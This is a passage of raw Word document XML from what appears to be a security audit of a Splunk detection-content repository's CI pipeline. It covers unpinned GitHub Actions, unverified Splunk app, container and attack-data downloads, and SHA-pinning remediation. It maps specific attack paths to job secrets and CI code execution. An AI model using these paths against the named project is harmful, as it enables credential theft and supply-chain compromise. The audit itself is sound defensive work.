        </w:rPr>
        <w:t>3d3c42e5...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). GitHub's own hardening guide and the March 2025 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tj-actions/changed-files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> incident </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[TK]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> show the failure mode: the tag is retargeted to code that dumps runner memory/secrets. Here two third-party actions are in the most sensitive positions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>peter-evans/create-pull-request@v8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> receives a PAT (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DATA_SOURCES_DEPENDABOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) that can push branches and open PRs against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws-actions/configure-aws-credentials@v6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> receives static AWS keys. Dependabot is configured for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github-actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (weekly), which mitigates staleness and will even maintain SHA pins once they exist - but today it only bumps tags. Node runtime: all 7 actions declare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>node24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (verified via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>action.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), so there is no imminent node16/node20 breakage. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/setup-python@v6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is behind the new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>v7.0.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> major (minor concern). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = upstream action repository tag -&gt; runner executes action JS with job secrets in memory. Who controls: action maintainers / their account security. PR authors cannot change </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uses:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in protected workflows that run on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with base-repo checkout. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires upstream compromise). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git ls-remote --tags https://github.com/actions/checkout.git refs/tags/v7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3d3c42e5aac5ba805825da76410c181273ba90b1 refs/tags/v7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (lightweight: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^{}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> peel entry, so it is directly movable); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws-actions/configure-aws-credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>v6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an annotated tag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4a1596c8...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> peeling to commit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>e1253824e5c10ff9df46874f81ed3ec929e19cfd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Semgrep: 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.github-actions.security.github-actions-mutable-action-tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WARNINGs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: pin every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uses:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a full commit SHA with the version as a trailing comment (Dependabot keeps the comment and SHA in sync):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># verified SHAs as of 2026-10-06 (git ls-remote); re-verify before committing</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 uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1          # v7.0.1</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 uses: actions/setup-python@ece7cb06caefa5fff74198d8649806c4678c61a1      # v6 (evaluate v7.0.0)</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 uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a   # v7.0.1</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 uses: actions/labeler@bf12e9b00b37c5c0ca2b87b79b2daf7891dbda13           # v7.0.0</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 uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e          # v7.0.0</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with: { go-version: '1.25.14', cache: false }</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 uses: peter-evans/create-pull-request@5f6978faf089d4d20b00c7766989d076bb2fc7f1   # v8.1.1</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 uses: aws-actions/configure-aws-credentials@e1253824e5c10ff9df46874f81ed3ec929e19cfd # v6.3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Also add a repository-level allow-list (Settings -&gt; Actions -&gt; "Allow actions created by GitHub and selected verified creators" plus the two third-party actions by SHA) and, for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datasource-dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, replace the PAT with a GitHub App token or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github.token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions: {contents: write, pull-requests: write}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_nist_ai_rmf_detection_map.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> already does. Why it works: a SHA is content-addressed; moving a tag no longer changes what runs. Dependabot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github-actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ecosystem, already enabled) will open PRs that bump the SHA and comment together, so there is no maintenance regression. Renovate alternative: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"extends": ["helpers:pinGitHubActionDigests"]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-829 Inclusion of Functionality from Untrusted Control Sphere; CWE-1357 Reliance on Insufficiently Trustworthy Component; CWE-494 Download of Code Without Integrity Check. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools, T1552.001 Unsecured Credentials: Credentials In Files. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SR-3 Supply Chain Controls and Processes, SR-4 Provenance, SA-22 Unsupported System Components, CM-7 Least Functionality, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GV.SC Govern - Cybersecurity Supply Chain Risk Management, PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.21 Managing information security in the ICT supply chain, A.8.19 Installation of software on operational systems, A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-03 — Splunk apps, attack data and container images downloaded without integrity verification from mutable locations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.1). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contentctl.yml:25,37-264,62-70,266-268; .github/workflows/unit-testing.yml:64; .github/workflows/appinspect.yml:41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Splunk apps and test data are downloaded without integrity verification from mutable locations (S3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hardcoded_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Latest/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prefix, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunk/splunk:latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tags, Git LFS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, GitHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>releases/latest</w:t>
      </w:r>
      <w:r>
        <w:t>)</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62</w:t>
        <w:tab/>
        <w:t>- uid: null</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63</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  title: Splunk Fix XmlWinEventLog HEC Parsing</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64</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  appid: Splunk_FIX_XMLWINEVENTLOG_HEC_PARSING</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65</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  version: '0.1'</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70</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  hardcoded_path: https://attack-range-appbinaries.s3.us-west-2.amazonaws.com/Latest/Splunk_TA_fix_windows.tgz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Splunk apps are tarballs that contain Python executed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunkd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (modular inputs, custom search commands). contentctl-ng installs 38 of them into the test instance purely by URL; the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> schema has no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sha256</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and nothing in the repo records what the bytes should be. One entry points at a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Latest/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object that is overwritten in place, so even the version string is not stable. The Splunk container itself is pulled by floating tag (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; currently 9.3.14; the unit-test workflow uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; 10.6.0 today), so CI tests run against a moving target and are not reproducible. Attack data for 2,154 detection tests comes from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunk/attack_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via Git LFS, again without pinning to a commit. The appinspect job downloads the previous release tarball from GitHub and feeds it to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng inspect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> without checking a digest. All of these are Splunk-controlled origins over TLS, so the realistic threat is an insider/compromised AWS account or bucket misconfiguration rather than a network MITM; impact would be code execution in CI and on every developer's Docker host that runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = objects in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack-range-appbinaries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (written by the job in DEP-02) / Docker Hub tag / LFS branch -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Splunk app install REST API -&gt; Python inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunkd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the test container (and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-adjacent runner). Who controls: Splunk STRT (legitimately), or whoever compromises the writer job or AWS account. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (defense-in-depth gap; no evidence of tampering). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Configuration evidence only (read-only review): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -c hardcoded_path contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; 38; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -nE 'sha|hash|digest|checksum' contentctl.yml install.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; no matches. Docker Hub API (verified 2026-10-06): tag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> digest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sha256:c27ffb9ecff1406881...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> updated 2026-07-01; tag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> points to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.6.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2026-10-01) - i.e. the two Splunk versions the repo tests against differ by one major release. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: pin by digest/hash everywhere the format allows; pin LFS data to a commit; verify the release tarball.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># contentctl.yml (excerpt) - pin the container by digest and record app hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>container_settings:</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full_image_path: registry.hub.docker.com/splunk/splunk:10.0.11@sha256:&lt;digest from `docker buildx imagetools inspect splunk/splunk:10.0.11`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>apps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- uid: 1621</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title: Splunk_SA_CIM</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appid: Splunk_SA_CIM</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version: 8.7.0</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hardcoded_path: https://attack-range-appbinaries.s3.us-west-2.amazonaws.com/splunk-common-information-model-cim_870.tgz</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sha256: &lt;sha256sum of the tgz&gt;          # requires a small contentctl-ng schema extension (App.sha256: str | None) and</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 verification in the downloader; until then, publish SHA256SUMS next to the objects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
